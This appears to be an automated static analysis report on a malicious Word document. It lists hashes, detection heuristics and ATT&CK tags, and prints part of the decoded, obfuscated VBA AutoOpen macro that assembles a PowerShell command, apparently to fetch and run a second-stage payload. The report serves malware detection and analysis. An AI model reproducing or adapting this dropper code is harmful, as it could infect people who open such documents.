Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e6efb24b952985dc…

MALICIOUS

Office (OLE)

219.5 KB Created: 2018-06-26 19:18:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 3873f5c77a4b4b9bae5cacffb068b350 SHA-1: 08d7a71e9b56ed2d9add12db291fa81df62b4667 SHA-256: e6efb24b952985dc741afdf51ac70bbe51eaddd5665cf063e4513d8c20fcd61c
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function to execute a command, likely to download and run a second-stage payload. The reconstructed command string suggests an attempt to execute a downloaded file.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6592390-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6592390-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9713 bytes
SHA-256: 37729ef9342e257da81b29f7d50cf74f34ad872c0e03a859034c6d249cc4d915
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "UwkKPFlwiZD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NoiwmlVDIzU"
Function kGwiHD()
On Error Resume Next
irzTt = 16989
riCOk = nqPTQG
HDAjwn = Sin(53472)
BwmfS = 2928
WfBUv = CDate(20143)
zYXDJT = 75748
jzMvLHw = "Hell" + "  . " + Chr(40) + " $SHE" + "llId[1" + "]" + Chr(43) + "$S" + "heLL" + "iD[13]" + Chr(43) + "'X'" + Chr(41) + Chr(40)
pfFXa = 28330
OkSSYW = 41110
TnIYT = CDate(50683)
aubha = Sin(55561)
RZNzq = 19085
akQLfD = vXwiuf
iIqqqS = Chr(34) + " $" + Chr(40) + " sE" + "T-varIAB" + "Le  'OFs" + "' '" + "' " + Chr(41) + Chr(34) + Chr(43) + "[st"
FlAiX = 50348
zBHNFK = 96845
pZpPUz = CDate(55103)
nMSTj = Sin(22431)
fKADv = 18370
nEBsLI = qziMi
MYnirwTT = "RING]" + Chr(40) + "'114W7O3" + "8i24E1" + "07" + "J56-51" + ">3" + "3O12" + "3W" + "57O52"
ZLllLD = 58921
PswdKL = 64571
HhivY = CDate(411)
RJwIIY = Sin(87250)
qqAnp = 70926
ZMbiIu = oQwGD
vTUrzJRSXIB = "X60-5" + "1U53J34" + ">118>24>" + "51Z3" + "4E1" + "20i1O5" + "1O5" + "2Z21U58U"
VqZEKS = 74445
HAwuM = 42886
zQLJK = CDate(71982)
JOlaW = Sin(59888)
qwfQIX = 84100
ArzPj = bqSJM
ibQHrpj = "63>51Z56" + "Z34O" + "109Z11" + "4Z33-2" + "9X0X107X" + "113-62i" + "34X34X38" + "W108E12" + "1U121U"
qMlMdr = 40208
bjipr = 11094
ktnpj = CDate(79293)
TfwuA = Sin(87)
iiDMz = 18987
irnhwM = borrB
rvQUwrocOjN = "33X3" + "3O33" + "U120Z" + "50Z51W51" + ">44" + ">55W5" + "5U35J34W" + "57X12" + "0-5" + "3W5" + "7i5"
oXRSkP = 27472
rwrBzr = 75537
hHoEL = CDate(16046)
PurnbZ = Sin(18656)
zIQZtL = 71935
DXllSJ = obhmGB
qjBEdVKvoRN = "9O121O27" + "X59" + "Z57" + "i44" + "O14J3" + "0J" + "26E57"
jbsjUb = 67797
rOOUS = 75309
vUCht = CDate(78746)
wAfQRj = Sin(59908)
TrDijr = 23278
WsHXc = sPkDi
dENEaV = "W48Z" + "121U2" + "2>6" + "2W34J" + "34W38>" + "108" + "X121Z121" + "J3" + "3X33Z33X"
EBdqFU = 24951
OFmQlM = 87154
iSQHB = CDate(72507)
jGAGMl = Sin(54721)
zQFii = 99513
NhzPX = JXfQn
wVfTYOPDTnS = "120E55" + ">37J55" + "Z63W32" + "i5" + "5O59W1" + "20J5"
WRFudw = 28734
iJaIm = 76464
OlrDTG = CDate(3315)
ocjWAR = Sin(89483)
wUErj = 5855
FsbuY = cQlXUd
cOYovHzHZo = "3U" + "57O59>1" + "21" + "E17J3" + "3U58>" + "59X5" + "3O10" + "1E48>1O3"
jhIjsI = 59700
ULWju = 79568
oGjJaB = CDate(56848)
YXBfz = Sin(94973)
iTwwp = 40288
qLLNln = NVEnnB
WJkTwm = "Z12E121-" + "22W62J34" + "Z34U" + "38" + "W108O121" + "X121J33" + "-3" + "3X33U" + "120"
kGwiHD = jzMvLHw + iIqqqS + MYnirwTT + vTUrzJRSXIB + ibQHrpj + rvQUwrocOjN + qjBEdVKvoRN + dENEaV + wVfTYOPDTnS + cOYovHzHZo + WJkTwm
PTOdiN = 94341
DIpEVf = 9406
cXzsP = CDate(26109)
LmvbNs = Sin(35263)
aUnnAE = 57422
INpUI = OQvSap
End Function
Function FjwBlhZOtj()
On Error Resume Next
bojMK = 46776
jiOlKp = 64607
sKZGvP = CDate(20802)
RrSKmZ = Sin(25364)
whMZMM = 23892
MisUi = BhHmki
lpBjEwt = "J53O55W5" + "3E6" + "2O63W3" + "7>5" + "0i63" + "E49Z63>" + "34J55-" + "58Z1" + "20" + "i5" + "3W57i" + "59-"
hdbza = 95931
RXzGRi = 86000
LLDzpt = CDate(32350)
lPZTpz = Sin(37909)
QbjjWE = 84157
VqzNB = uVjphq
qZEttjUUiY = "121i97O" + "59J21J" + "28J" + "21-57i" + "23X33X" + "2i" + "121J" + "22" + ">62Z34J3" + "4Z38E" + "108"
YPqKj = 39132
XFTDH = 90147
OmsEZh = CDate(63005)
GOhCR = Sin(68285)
buKXK = 35709
vFDEPQ = iaDmua
WDOilOp = "E121J121" + "O33X3" + "3Z33" + "U120i" + "52O" + "57" + ">50-47E1" + "23Z5" + "9>55X37" + "W37"
uCwqFB = 19067
MVjdq = 58032
bdrJKD = CDate(87321)
AHYTMJ = Sin(93982)
TazhN = 47386
GZZaT = shEwT
skTimtptQ = "J55-4" + "9O51W12" + "0E53-57" + "W59W120i" + "35" + "i55W121"
zbNIQ = 48792
IllKbU = 88151
TlQGw = CDate(40740)
GzQia = Sin(78462)
lhTFa = 29263
VAbsq = GrMBVK
McfUJP = "i0Z111-3" + "2W18" + "J3" + "3X99Z" + "21X1" + "00U101E" + "121Z22X" + "62" + "U34W" + "34-" + "38O10"
fHptIC = 27230
MlmjwF = 33904
vcSAdd = CDate(80892)
LSMmQw = Sin(66989)
uUYYVF =
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.